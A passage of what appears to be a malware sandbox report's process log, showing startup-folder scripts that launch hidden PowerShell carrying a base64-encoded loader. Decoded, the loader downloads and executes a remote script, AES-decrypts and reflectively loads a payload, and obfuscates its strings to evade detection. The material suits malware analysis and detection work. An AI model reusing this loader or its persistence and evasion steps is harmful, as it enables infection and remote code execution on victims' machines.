ZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0b65a00e.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0b65a00e.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6c687774.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6c687774.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_03a3688f.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_03a3688f.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_95d3f0d3.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_95d3f0d3.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e74002f.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e74002f.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
